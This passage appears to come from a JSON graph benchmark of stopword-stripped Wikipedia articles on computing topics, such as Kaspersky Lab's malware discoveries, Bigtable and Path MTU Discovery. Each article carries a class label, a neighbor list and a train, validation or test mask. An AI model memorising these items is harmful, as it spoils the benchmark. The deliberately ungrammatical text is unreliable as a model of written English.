kaspersky lab officially left business software alliance bsa sopa bsa supported controversial anti-piracy bill kaspersky lab support stating believe measures used contrary modern advances technology needs consumers show disapproval announced intent leave december 5 2011 2013 company unaudited 667 million annual revenues 2014 kaspersky lab signed distribution deal ingram micro significantly expanded reseller program august 2015 two former kaspersky employees alleged company introduced modified files virustotal antivirus database trick software kaspersky competitors triggering false positives virus malware scans possible motive eugene allegedly furious competitors perceived unfairly free-riding kaspersky malware discoveries via open-source virustotal database company denied allegations personal blog eugene kaspersky compared accusations unsubstantiated conspiracy theories reuters followed publishing leaked emails allegedly kaspersky alluding falsies rubbing foreign competitors kaspersky lab stated emails may legitimate obtained anonymous sources hidden agenda 2016 kaspersky executive ruslan stoyanov arrested russian authorities charges predating work kaspersky 2019 convicted treason kaspersky lab develops markets antivirus internet security password management endpoint security cybersecurity products services fourth fifth largest endpoint security vendor third largest consumer security software company sixth largest overall security company revenues 15 percent russian companies domestically one-third european organizations one-fourth u.s. organizations software 400 million users kaspersky consumer software include antivirus internet security total security products antivirus software includes malware protection monitors pc suspicious program behavior warns users potentially dangerous websites internet security software adds privacy features parental controls anti-phishing tools total security adds parental controls adult website filters diagnostic tools password manager application features kaspersky software available macs pcs android ios windows mobile blackberry symbian businesses company markets kaspersky endpoint security business suite includes centralized user interface management application called kaspersky security center cybersecurity software called kaspersky security network kaspersky administration kitsecurity center manages configuration installation remote use business suite also quarantine reporting features software product businesses 25 staff less called kaspersky small office security ksos within suite products specifically virtualization security mobile security fraud protection among others kaspersky also develops free tool helps businesses gain access windows devices infected ransomware kaspersky anti-virus engine also powers products solutions security vendors check point bluecoat juniper networks microsoft forefront netintelligence clearswift frontbridge netasq wedge networks others altogether 120 companies licensing technology kaspersky lab kaspersky lab also number partnerships various technology companies international multilateral partnership cyber threats datuk mohd noor amin acts chairman announced appointment harry cheung – managing director kaspersky lab apac – goodwill ambassador greater china kaspersky lab runs several global sponsorships example scuderia ferrari racing team geographical expeditions according pc magazine kaspersky antivirus competitor bitdefender consistently ranked top independent competitive tests pc magazine malware phishing tests similar results praised software bonus security tools cons magazine said took longer-than-expected complete scan magazine said kaspersky total security product impressive feature list praised extra features total security product like password management encryption parental controls pc magazine said product scored highly lab tests antivirus antiphishing features so-so scores antimalware tests n't able catch spam kaspersky 2013 endpoint security windows product top-ranked enterprise antivirus software competitive test dennis technology labs followed symantec endpoint protection av-comparatives awarded kaspersky product year 2015 based number high scores gotten throughout year wide range tests pc magazine praised software features said lacked policy management deployment options kaspersky parental controls software reviewed pc magazine reviewer said well-rounded affordable parental control monitoring praised software content filtering child profiles social media monitoring features criticize features available ios android anti-virus software testing group av-comparatives gave windows xp version kaspersky av advanced+ rating highest february 2008 on-demand detection test fourth highest detection rate among 16 products tested however retrospective/proactive test may 2008 kaspersky received standard rating detecting 21 new malware 1-month old signatures receiving substantial amount false positives firewall included kaspersky internet security 7.0 got good rating matousec firewall challenge result 85 kaspersky anti-virus 7.0 achieved 6.5 result 8 anti malware labs rootkit detection test also achieved 31 33 detection polymorphic viruses 97 result self-protection test 2007 kaspersky internet security 7 received award british magazine pc pro also place list kaspersky passed virus bulletin comparative tests since august 2003 2005 according pc world magazine kaspersky anti-virus software provided fastest updates new virus security threats industry pc world magazine march 2010 comparison consumer security suites kaspersky internet security 2010 scored 4.5/5 stars rated second overall december 2011 version av-comparatives annual reports kaspersky lab software achieved highest overall ranking earned av comparatives product year award 1 february 2012 kaspersky internet security earned av-test award best repair 2011 award field home user products av-test institute 28 january 2013 kaspersky endpoint security earned av-test award best protection 2012 av-test award best repair 2012 awards field corporate products av-test institute later 2013 kaspersky earned product year award av-comparatives highest score among enterprise solutions dennis technology labs report kaspersky also received certification products oesis ok certification program verifies applications interoperable third-party technology solutions like nac ssl vpn products cisco systems juniper networks f5 networks others kaspersky lab global research analysis team great established 2008 investigates cybersecurity threats work malware operations security companies often evaluated ability uncover previously unknown viruses vulnerabilities kaspersky reputation investigating cyber-security threats influential gaining sales prestige beginning around 2010 kaspersky exposed series government-sponsored cyber-espionage sabotage efforts include stuxnet duqu flame gauss regin equation group according wired many seemingly launched us uk israeli allies kaspersky especially well-known work uncovering stuxnet flame 2010 kaspersky lab worked microsoft counter-act stuxnet worm infected 14 industrial locations iran using four zero-day vulnerabilities microsoft windows according ieee spectrum circumstances strongly suggest worm developed united states israel damage centrifuges iran nuclear-enrichment program first discovery major government-sponsored cyber-attack may 2012 kaspersky lab identified malware flame researcher described potentially sophisticated cyber weapon yet unleashed according researchers kaspersky lab malware infected estimated 1,000 5,000 machines worldwide asked united nations international telecommunications union investigate reports virus affecting iranian oil ministry computers kaspersky lab investigated discovered md5 hash filename appeared customer machines middle eastern nations discovering pieces researchers dubbed program flame name one modules flame earlier variant stuxnet kaspersky never verified source software suspected developed national security agency nsa transmit keystrokes skype calls data kaspersky created algorithms find similar malware found gauss july collected transmitted data devices infected bluetooth usb drives january 2013 kaspersky discovered red october malware used widespread cyber-espionage five years targeted political targets like embassies nuclear sites mostly europe switzerland north america malware likely written russian-speaking hackers exploits chinese hackers june kaspersky discovered nettraveler said obtaining data emerging technology government targets oil companies kaspersky identify behind similar cyber-espionage coming beijing china later year kaspersky discovered hacker group called icefog investigating cybersecurity attack japanese television company kaspersky said hacker group possibly china unique targeted specific files seemed know planting malware extract february 2014 kaspersky identified malware mask infected 380 organizations 31 countries many organizations affected morocco files spanish group believed nation-state conducting espionage kaspersky speculate country may developed november 2014 symantec kaspersky authored papers contained first disclosure malicious software named regin according kaspersky regin similar qwerty malware program discovered next year regin used take remote control computer believed originated five eyes alliance month kaspersky reported darkhotel attack targeted users wireless networks hotels asia asked users update software downloaded malware gave passwords 2015 kaspersky identified highly sophisticated threat actor called equation group group incorporated sophisticated spying software firmware hard drives banks government agencies nuclear researchers military facilities countries frequent targets us intelligence efforts suspected developed national security agency nsa included many unique technical achievements better avoid detection day kaspersky announced discovery hacker group called carbanak targeting banks moving millions dollars fake accounts carbanak discovered one bank asked kaspersky investigate suspicious behavior atms similar malware using techniques carbanak discovered 2016 dubbed carbanak 2.0 june 2015 kaspersky reported network infiltrated government-sponsored malware evidence suggested malware created developers duqu stuxnet order get intelligence would help better avoid detection kaspersky future kaspersky called duqu 2.0 malicious software resided memory avoid detection hack believed done group duqu 2011 used exploits microsoft installer files june 2015 kaspersky lab citizen lab independently discovered software developed hacking team used 60 governments around world covertly record data mobile phones citizens software gave police enforcement menu features access emails text messages keystrokes call history data kaspersky also identified 37,000 attacks banking companies used modifications malware called asacub took control android devices asacub targeted mostly banking customers u.s. russia ukraine using sms message baited users installing trojan 2016 kaspersky discovered zero day vulnerability microsoft silverlight kaspersky identified string code often used exploits created suspected author used yara rules network kaspersky software users find string code uncover rest exploit afterwards microsoft issued critical software patch protect software vulnerability 2016 kaspersky uncovered poseidon group would infiltrate corporations malware using phishing emails get hired company security firm correct problem hired poseidon would install additional malware backdoors june 2016 kaspersky helped uncover russian hacking group leading 50 arrests since 2015 kaspersky alleged close ties russian government various western media outlets finally us government 2017 president trump signed legislation ban software kaspersky government computers us government institutions prohibited buying installing kaspersky software computers devices",
    "neighbors": [
      2049,
      9750,
      1052,
      9761,
      550,
      2601,
      6699,
      3116,
      5178,
      10308,
      6728,
      7251,
      2654,
      2147,
      9832,
      10348,
      10872,
      4732,
      9341,
      1662,
      127,
      9346,
      131,
      5764,
      6797,
      10385,
      150,
      665,
      3225,
      3739,
      156,
      2717,
      3742,
      9375,
      161,
      2721,
      675,
      2213,
      6823,
      3243,
      6834,
      5305,
      704,
      7362,
      202,
      10957,
      7887,
      11476,
      1242,
      4314,
      6372,
      6382,
      9460,
      7418,
      3843,
      5891,
      11019,
      3342,
      9488,
      10003,
      4374,
      6431,
      5924,
      1318,
      4903,
      11559,
      297,
      2859,
      8493,
      5935,
      4403,
      9523,
      1337,
      11583,
      9537,
      3395,
      4421,
      6473,
      1355,
      10574,
      5971,
      8024,
      2907,
      7515,
      3935,
      6496,
      9055,
      9569,
      11622,
      9068,
      4464,
      5490,
      3955,
      2425,
      899,
      1925,
      1417,
      3981,
      10637,
      11152,
      7065,
      10141,
      9630,
      1440,
      5024,
      5025,
      5540,
      8614,
      8615,
      11177,
      6059,
      1970,
      3506,
      10166,
      4023,
      7103,
      3520,
      7619,
      1994,
      5069,
      10708,
      2005,
      7639,
      8664,
      9688,
      11225,
      8668,
      1504,
      488,
      9713,
      6643,
      3065,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7810,
    "label": 6,
    "text": "Ntfsresize:ntfsresize ntfsresize free unix utility non-destructively resizes ntfs filesystem used windows nt 4.0 2000 xp 2003 vista 7 8 10 typically hard-disk partition ntfs versions used 32-bit 64-bit windows supported defragmentation required prior resizing since version 1.11.2. ntfsresize included ntfsprogs package developed linux-ntfs project n't unix system installed still possible run ntfsresize using one many linux live cds",
    "neighbors": [
      3969,
      546,
      10851,
      9320,
      1801,
      4074,
      1101,
      8909,
      4815,
      2864,
      2193,
      3250,
      8147,
      5492,
      11667,
      823,
      10971,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 7811,
    "label": 5,
    "text": "INAP:inap inap stands intelligent network application protocol intelligent network application part signalling protocol used intelligent networking part signalling system 7 ss7 protocol suite typically layered top transaction capabilities application part tcap also termed logic controlling telecommunication services migrated traditional switching points computer based service independent platform international telecommunication union itu defines several capability levels protocol starting capability set 1 cs-1 typical application number translation service example united kingdom 0800 numbers freephone numbers translated geographic number using platform telephone exchanges decode 0800 numbers trigger exchange connects telephone exchange uses transaction capabilities application part tcap signaling connection control part sccp inap terms service switching point ssp sends inap initial detection point idp message service control point scp scp returns inap connect message contains geographic number forward call inap messages defined using asn.1 encoding sccp used routing extended form inap customised applications mobile networks enhanced logic camel tcap used separate transactions discrete units",
    "neighbors": [
      706,
      5704,
      7120,
      10864,
      11286,
      7865,
      1437
    ],
    "mask": "None"
  },
  {
    "node_id": 7812,
    "label": 2,
    "text": "Linux_range_of_use:linux range use linux kernel-based operating systems widely adopted wide range uses advantages benefits free open-source software apply linux kernel rest system software common human interface devices hids available desktop computers laptops similar devices determine design graphical human-computer interface implemented software software packages choose among building accordingly designed graphical user interface generic input driver linux kernel evdev several input methods implemented middleware i.e. atop part linux kernel adoption proving linux kernel suitable gaming platform course added software needed either augment typical desktop installation suitable gaming platform create linux-based operating system dedicated gaming platform abundance server software cf client–server model supporting various communications protocols http web server smtp mail transfer agents pop3 imap e-mail server lightweight directory access protocol ldap server message block smb-cifs samba simple network management protocol snmp system network monitoring session initiation protocol sip various routing protocols run partly exclusively linux kernel software bundles also called solution stacks widely adopted acronyms become well known examples include dynamic web pages cloud computing three types virtualization hardware-based software-based paravirtualization implemented projects run linux linux-exclusive linux kernel customized adapted hardened various scenarios especially operation bastion host already mainlined developed maintained out-of-tree linux kernel-based operating systems still employed routing servers server computers commodity hardware cases professional routing equipment cisco catalyst either overkill costly components linux kernel netfilter linux network scheduler along available free open-source routing daemons bird internet routing daemon bird b.a.t.m.a.n. quagga xorp fulfill task well low-cost low-performance routing performed wireless routers running openwrt anonymity routing solution tor cross-platform exclusive linux components linux kernel logical volume manager lvm well suited support computer clusters also software managing clusters e.g. pacemaker linux-ha drbd ovirt openqrm ganeti eucalyptus appscale opennebula single system image multi system image clusters least linuxpmi openssi open-sharedroot diskless shared-root cluster kerrighed available three solutions operating-system-level virtualization linux-vserver lxc openvz offer similarities freebsd jails solaris containers linux operating systems runs virtualized xen micro-kernel-type hypervisor published license linux kernel gnu gpl 2.0 kvm possible turn linux kernel hypervisor managing libvirt libguestfs several utilities building programs openstack controller nodes run exclusively linux compute nodes cross-platform software projects serving similar use-case openstack nimbus ganeti appscale opennebula eucalyptus openqrm one best known linux-based operating systems mobile devices smartphones android operating system android employs modified linux kernel combines libbionic instead glibc surfaceflinger display server replacements specifically written purpose many mobile devices touchscreen sole human interface device hid gui partly middleware operating system adapted enable software designers create according human-computer interface linux kernel gained wide use operating systems used embedded systems real-time non-real-time variants patches exist transform linux kernel real-time kernel termed real-time operating system rtos several actively maintained minimally operating system includes less modified linux kernel uclibc busybox non-rtos variants exist openwrt also linux distribution use customer-premises equipment cpe devices like wireless routers rockbox based μclinux operating system portable media players fastest supercomputers decade since earth simulator used linux linux also ran first teraflops supercomputer asci red 1997 ibm roadrunner 2008 first petascale computer 500 100 world fastest supercomputers run operating system based linux kernel world ’ fastest supercomputer china ’ sunway taihulight powered colossal 650,000+ cpus runs customised version linux called ‘ sunway raiseos ’ processing speed 93 petaflops",
    "neighbors": [
      2560,
      516,
      4616,
      3082,
      5644,
      5139,
      9237,
      10780,
      4637,
      10271,
      10785,
      3618,
      6180,
      9257,
      1584,
      8242,
      9266,
      1083,
      3133,
      4161,
      10817,
      8772,
      6213,
      8262,
      8268,
      589,
      7248,
      593,
      2134,
      3162,
      3677,
      2658,
      4194,
      6244,
      5222,
      10856,
      6763,
      4207,
      118,
      5244,
      4734,
      11391,
      8326,
      7821,
      4238,
      10382,
      657,
      2195,
      9366,
      2711,
      6808,
      9882,
      6301,
      1694,
      2723,
      11428,
      8364,
      2222,
      9909,
      10933,
      5822,
      5824,
      4803,
      1736,
      2762,
      6352,
      3289,
      3801,
      3802,
      4831,
      8928,
      225,
      1761,
      10464,
      2278,
      233,
      4841,
      7403,
      11502,
      7920,
      10482,
      4852,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      5410,
      295,
      1833,
      815,
      7983,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      8520,
      7497,
      6988,
      4429,
      10063,
      2901,
      4437,
      11095,
      5978,
      3422,
      863,
      865,
      2914,
      8554,
      10091,
      6508,
      7020,
      7022,
      1394,
      1396,
      8573,
      1406,
      10111,
      1920,
      3458,
      7555,
      900,
      8066,
      11654,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      2986,
      4011,
      9646,
      1456,
      1972,
      11188,
      8122,
      9660,
      10687,
      9667,
      8644,
      4040,
      457,
      5067,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      5612,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      6651,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 7813,
    "label": 4,
    "text": "Suricata_(software):suricata software suricata open source-based intrusion detection system ids intrusion prevention system ips developed open information security foundation oisf beta version released december 2009 first standard release following july 2010 third-party tools available snort compatible suricata like following",
    "neighbors": [
      3714,
      8770,
      4777,
      6345,
      6797,
      8141,
      7983,
      4561,
      5874,
      7153,
      7889,
      5245,
      823,
      186,
      2045,
      3486,
      6559
    ],
    "mask": "Test"
  },
  {
    "node_id": 7814,
    "label": 3,
    "text": "Kernel_preemption:kernel preemption kernel preemption method used mainly monolithic hybrid kernels device drivers run kernel space whereby scheduler permitted forcibly perform context switch i.e preemptively schedule behalf runnable higher priority process driver part kernel execution rather co-operatively waiting driver kernel function system call complete execution return control processor scheduler two main benefits method monolithic hybrid kernels answer one main criticisms monolithic kernels microkernel advocates",
    "neighbors": [
      2345,
      7983,
      7057,
      7187,
      1207,
      7483,
      3197
    ],
    "mask": "None"
  },
  {
    "node_id": 7815,
    "label": 5,
    "text": "Inverse_Multiplexing_for_ATM:inverse multiplexing atm inverse multiplexing atm ima standardized technology used transport atm traffic bundle t1 e1 lines called ima group allows gradual increase data link capacity implementing higher capacity solution like t3/e3 sonet/sdh deemed feasible maximum number lines ima group 32 bringing total data rate roughly 64 mbit/s standard specification initially approved atm forum july 1997 later updated version 1.1 march 1999 atm cell insertion happens round robin fashion transparent terminal equipment ends link ima inverse multiplexing functionality requires overhead icp ima control protocol cells typically one icp cell every ima frame—commonly 128 cells length—and ctc common transmit clock mode icp stuff cell must inserted every 2048 cells ima sublayer physical layer",
    "neighbors": [
      4963,
      7815,
      4202,
      3156,
      1977
    ],
    "mask": "None"
  },
  {
    "node_id": 7816,
    "label": 1,
    "text": "Bigtable:bigtable bigtable compressed high performance proprietary data storage system built google file system chubby lock service sstable log-structured storage like leveldb google technologies may 6 2015 public version bigtable made available service bigtable also underlies google cloud datastore available part google cloud platform bigtable development began 2004 used number google applications web indexing mapreduce often used generating modifying data stored bigtable google maps google book search search history google earth blogger.com google code hosting youtube gmail google reasons developing database include scalability better control performance characteristics google spanner rdbms layered implementation bigtable paxos group two-phase commits table google f1 built using spanner replace implementation based mysql bigtable one prototypical examples wide column store maps two arbitrary string values row key column key timestamp hence three-dimensional mapping associated arbitrary byte array relational database better defined sparse distributed multi-dimensional sorted map bigtable designed scale petabyte range across hundreds thousands machines make easy add machines system automatically start taking advantage resources without reconfiguration example google copy web stored bigtable row key domain-reversed url columns describe various properties web page one particular column holding page page column several timestamped versions describing different copies web page timestamped fetched cell bigtable zero timestamped versions data another function timestamp allow versioning garbage collection expired data tables split multiple tablets – segments table split certain row keys tablet hundred megabytes gigabytes size bigtable somewhat like mapreduce worker pool thousands hundreds thousands tablet shards may served hundreds thousands bigtable servers table size threaten grow beyond specified limit tablets may compressed using algorithm bmdiff zippy compression algorithm publicly known open-sourced snappy less space-optimal variation lz77 efficient terms computing time locations gfs tablets recorded database entries multiple special tablets called meta1 tablets meta1 tablets found querying single meta0 tablet typically resides server since often queried clients location meta1 tablet answer question actual data located like gfs master server meta0 server generally bottleneck since processor time bandwidth necessary discover transmit meta1 locations minimal clients aggressively cache locations minimize queries",
    "neighbors": [
      4096,
      6156,
      8719,
      3600,
      7700,
      9244,
      9245,
      10284,
      5677,
      3633,
      2612,
      9782,
      4683,
      11343,
      3664,
      8285,
      2658,
      8821,
      119,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      10921,
      1203,
      7359,
      196,
      3269,
      3782,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      236,
      9970,
      7926,
      3836,
      3326,
      2304,
      5892,
      8455,
      11535,
      10009,
      1306,
      10525,
      798,
      288,
      4901,
      7475,
      5431,
      2875,
      10045,
      11590,
      11592,
      7499,
      9039,
      3409,
      11111,
      8554,
      5483,
      7022,
      7548,
      1409,
      4995,
      9610,
      5522,
      1427,
      5524,
      10645,
      1435,
      9631,
      2978,
      1959,
      5034,
      3499,
      7595,
      5047,
      5560,
      5577,
      4044,
      4048,
      6632,
      5100,
      9712,
      6131,
      7155
    ],
    "mask": "Train"
  },
  {
    "node_id": 7817,
    "label": 5,
    "text": "Path_MTU_Discovery:path mtu discovery path mtu discovery pmtud standardized technique computer networking determining maximum transmission unit mtu size network path two internet protocol ip hosts usually goal avoiding ip fragmentation pmtud originally intended routers internet protocol version 4 ipv4 however modern operating systems use endpoints ipv6 function explicitly delegated end points communications session pmtud standardized ipv4 rfc 1191 ipv6 rfc 8201 obsoleted rfc 1981 previous ipv6 pmtud standard rfc 4821 describes extension techniques works without support internet control message protocol ipv4 packets path mtu discovery works setting n't fragment df flag bit ip headers outgoing packets device along path whose mtu smaller packet drop send back internet control message protocol icmp fragmentation needed type 3 code 4 message containing mtu allowing source host reduce path mtu appropriately process repeated mtu small enough traverse entire path without fragmentation ipv6 routers support fragmentation consequently n't support n't fragment option ipv6 path mtu discovery works initially assuming path mtu mtu link layer interface traffic originates similar ipv4 device along path whose mtu smaller packet drop packet send back icmpv6 packet big type 2 message containing mtu allowing source host reduce path mtu appropriately process repeated mtu small enough traverse entire path without fragmentation path mtu changes connection set lower previously determined path mtu first large packet cause icmp error new lower path mtu found conversely pmtud finds path allows larger mtu possible lower link os periodically reprobe see path changed allows larger packets linux windows timer set default ten minutes many network security devices block icmp messages perceived security benefits including errors necessary proper operation pmtud result connections complete tcp three-way handshake correctly hang data transferred state referred black hole connection implementations pmtud attempt prevent problem inferring large payload packets dropped due mtu rather link congestion however order transmission control protocol tcp operate efficiently icmp unreachable messages type 3 permitted robust method pmtud relies tcp another protocol probe path progressively larger packets standardized rfc 4821 workaround used routers change maximum segment size mss tcp connections passing links mtu lower ethernet default 1500 known mss clamping",
    "neighbors": [
      5472,
      10115,
      11461,
      10924,
      6797,
      4687,
      6992,
      1618,
      10005,
      823,
      5402,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 7818,
    "label": 6,
    "text": "Flash_file_system:flash file system flash file system file system designed storing files flash memory–based storage devices flash file systems closely related file systems general optimized nature characteristics flash memory avoid write amplification use particular operating systems block device layer emulate disk drive general-purpose file system used flash-based storage device suboptimal several reasons log-structured file systems desirable properties flash file system file systems include jffs2 yaffs particular characteristics flash memory best used either controller perform wear leveling error correction specifically designed flash file systems spread writes media deal long erase times nand flash blocks basic concept behind flash file systems flash store updated file system write new copy changed data fresh block remap file pointers erase old block later time practice flash file systems used memory technology devices mtds embedded flash memories controller removable flash memory cards usb flash drives built-in controllers manage mtd dedicated algorithms like wear leveling bad block recovery power loss recovery garbage collection error correction use flash file system limited benefit flash-based memory devices becoming prevalent number mobile devices increasing cost per memory size decreases capacity flash memory chips increases earliest flash file system managing array flash freely writable disk trueffs m-systems israel presented software product pc-card expo santa clara california july 1992 patented 1993 one earliest flash file systems microsoft ffs2 use ms-dos released autumn 1992 ffs2 preceded earlier product called ffs however fell short flash file system managing flash array write read many worm space rather freely writable disk around 1994 pcmcia industry group approved flash translation layer ftl specification based design m-systems trueffs specification authored jointly proposed m-systems scm microsystems also provided first working implementations ftl endorsed intel ftl became popular flash file system design non-pcmcia media well overlayfs unionfs aufs union filesystems allow multiple filesystems combined presented user single tree allows system designer place parts operating system nominally read-only different media normal read-write areas openwrt usually installed raw flash chips without ftl uses overlayfs combine compressed read-only squashfs jffs2",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      4634,
      3611,
      5661,
      9249,
      9762,
      5158,
      3629,
      7225,
      11323,
      8772,
      1109,
      4708,
      1126,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      6575,
      8114,
      7603,
      8631,
      1464,
      3512,
      1978,
      8643,
      9166,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7819,
    "label": 9,
    "text": "Electronic_circuit_simulation:electronic circuit simulation electronic circuit simulation uses mathematical models replicate behavior actual electronic device circuit simulation software allows modeling circuit operation invaluable analysis tool due highly accurate modeling capability many colleges universities use type software teaching electronics technician electronics engineering programs electronics simulation software engages user integrating learning experience kinds interactions actively engage learners analyze synthesize organize evaluate content result learners constructing knowledge simulating circuit ’ behavior actually building greatly improve design efficiency making faulty designs known providing insight behavior electronics circuit designs particular integrated circuits tooling photomasks expensive breadboards impractical probing behavior internal signals extremely difficult therefore almost ic design relies heavily simulation well known analog simulator spice probably best known digital simulators based verilog vhdl electronics simulators integrate schematic editor simulation engine on-screen waveform display see figure 1 allowing designers rapidly modify simulated circuit see effect changes output also typically contain extensive model device libraries models typically include ic specific transistor models bsim generic components resistors capacitors inductors transformers user defined models controlled current voltage sources models verilog-a vhdl-ams printed circuit board pcb design requires specific models well transmission lines traces ibis models driving receiving electronics strictly analog electronics circuit simulators popular simulators often include analog event-driven digital simulation capabilities known mixed-mode simulators means simulation may contain components analog event driven digital sampled-data combination entire mixed signal analysis driven one integrated schematic digital models mixed-mode simulators provide accurate specification propagation time rise/fall time delays event driven algorithm provided mixed-mode simulators general purpose supports non-digital types data example elements use real integer values simulate dsp functions sampled data filters event driven algorithm faster standard spice matrix solution simulation time greatly reduced circuits use event driven models place analog models mixed-mode simulation handled three levels primitive digital elements use timing models built-in 12 16 state digital logic simulator b subcircuit models use actual transistor topology integrated circuit finally c in-line boolean logic expressions exact representations used mainly analysis transmission line signal integrity problems close inspection ic ’ i/o characteristics needed boolean logic expressions delay-less functions used provide efficient logic signal processing analog environment two modeling techniques use spice solve problem third method digital primitives use mixed mode capability methods merits target applications fact many simulations particularly use a/d technology call combination three approaches one approach alone sufficient another type simulation used mainly power electronics represent piecewise linear algorithms algorithms use analog linear simulation power electronic switch changes state time new analog model calculated used next simulation period methodology enhances simulation speed stability significantly process variations occur design fabricated circuit simulators often take variations account variations small taken together change output chip significantly temperature variation also modeled simulate circuit performance temperature ranges",
    "neighbors": [
      7367,
      3756,
      7820,
      9231,
      3762,
      4243,
      5301,
      11125,
      3159,
      4792,
      5881
    ],
    "mask": "Train"
  },
  {
    "node_id": 7820,
    "label": 3,
    "text": "Analog_Devices:analog devices analog devices inc. adi also known simply analog american multinational semiconductor company specializing data conversion signal processing power management technology headquartered norwood massachusetts 2012 analog devices led worldwide data converter market 48.5 share according analyst firm databeans company manufactures analog mixed-signal digital signal processing dsp integrated circuits ics used electronic equipment technologies used convert condition process real-world phenomena light sound temperature motion pressure electrical signals analog devices approximately 100,000 customers following industries communications computer instrumentation military/aerospace automotive consumer electronics applications company founded two mit graduates ray stata matthew lorber 1965 year company released first product model 101 op amp hockey-puck sized module used test measurement equipment 1967 company published first issue technical magazine analog dialogue 1969 analog devices filed initial public offering became publicly traded company ten years later company listed new york stock exchange 1973 company first launch laser trim wafers first cmos digital-to-analog converter 1996 company reported 1 billion company revenue year jerald fishman named president ceo position held death 2013 see 2000 analog devices sales grew 75 2.578 billion company acquired five companies including bco technologies plc manufacturer thick film semiconductors 150 million january 2008 semiconductor completed acquisition cpu voltage pc thermal monitoring business analog devices. 184 million 2004 analog devices customer base 60,000 portfolio included 10,000 products july 2016 analog linear technology agreed analog would acquire linear approximately 14.8 billion cash stock deal analog devices headquartered norwood massachusetts regional headquarters located shanghai china munich germany limerick ireland tokyo japan analog devices fabrication plants located united states ireland company testing facility located philippines design centers located australia canada china egypt england germany india israel japan scotland spain taiwan turkey raymond stata founder analog devices responsible business strategy product roadmap founding company 1965 stata served company chairman board directors since 1973 executive officer since 1996 ceo 1973 1996 president 1971 1991 addition stata also trustee massachusetts institute technology alma mater awarded ieee founders medal 2003 stata received ee times lifetime achievement award 2008 stata served chairman semiconductor industry association year 2011 vincent roche became president ceo analog devices may 2013 first joined company 1988 marketing director limerick ireland barrie gilbert named first technology fellow analog devices 1979 addition gilbert ieee life fellow holds 65 patents gilbert best known gilbert cell – electronic multiplying mixer analog devices gilbert started company northwest labs design center oregon continued work rf products crafted high-speed nonlinear circuit techniques paul brokaw expert integrated circuit design spent career analog devices holds position analog fellow brokaw inventor many analog ic circuits including brokaw bandgap reference holds 100 patents also ieee life fellow robert adams technical fellow manager audio development analog devices inc. adams holds many patents related audio electronic field member ieee fellow audio engineering society adams received finalist ranking edn innovation innovator year award 1995 jerald g. fishman ceo president analog devices 1996 death march 2013 2004 fishman named ceo year electronic business 35-year veteran analog devices also served board directors analog devices cognex corporation xilinx analog devices products include analog signal processing digital signal processing technologies technologies include data converters amplifiers radio frequency rf technologies embedded processors digital signal processing dsp ics power management interface products data converters include analog-to-digital converters adcs digital-to-analog converters dacs convert electrical signal representations real-world analog phenomena light sound waveforms temperature motion pressure digital signals data back analog devices adc dac ics used medical systems scientific instrumentation wireless wired communications radar industrial process control audio video equipment digital-processing-based systems accurate signal conversion critical data converters account 50 adi revenue adi companion amplifier ics provide accurate high-speed precise signals driving data converters key applications digital audio current sensing precision instrumentation company data converter chips used national instruments high-precision measurement instrumentation systems data converters amplifiers also used scientists researchers project icecube – underground telescope uses digital optical modules doms detect subatomic particles south pole power management products customers industrial wireless infrastructure digital camera markets support signal chain design requirements dynamic range transient performance reliability interface products include broad range interface ic products offered company product categories controller area network digital isolators level translators lvds mobile i/o expander keyboard controller usb rs-232 amplifiers includes precision operational amplifiers instrumentation current sense differential amplifiers audio amplifiers video amplifiers/buffers/filters variable gain amplifiers comparators voltage specialty amplifiers products special linear functions radio frequency integrated circuits rfics address rf signal chain simplify rf system development company rf portfolio includes trupwr rms power detectors logarithmic amplifiers pll dds synthesizers rf prescalers variable gain amplifiers adc drivers gain blocks lnas rf amplifiers processors dsp programmable signal processing integrated circuits execute specialized software programs algorithms associated processing digitized real-time data analog devices processors dsps blackfin sharc sigmadsp tigersharc adsp-21xx precision analog microcontrollers make company embedded processing dsp portfolio multi-dsp signal processing analog devices line micro-electromechanical systems mems microphones sold business invensense 2013 analog devices mems microphones found smart phones tablet pcs security systems medical applications adi mems accelerometers designed game pad controllers microsoft logitech pellican analog devices sells linear mixed-signal mems digital signal processing technologies medical imaging patient monitoring medical instrumentation home healthcare company precision signal-processing components blackfin digital signal processors included karmelsonix wholter overnight pulmonary monitor wheezometer personal asthmatic assessment device accelerometers produced analog devices included zoll medical pocketcpr measures depth chest compressions provides audible visual feedback rescuer allow adjustment proper depth correct rate compression analog devices develops components safety systems stability control systems driver assistance systems infotainment interior applications powertrain systems hybrid electric vehicles use high-precision data conversion products battery monitoring control systems analog devices industrial market includes process control systems help drive productivity energy efficiency reliability analog devices technology consumer electronics includes signal processing circuits image processing auto focus image stabilization digital still cameras camcorders audio video processors home theater systems dvd recorders high-definition televisions 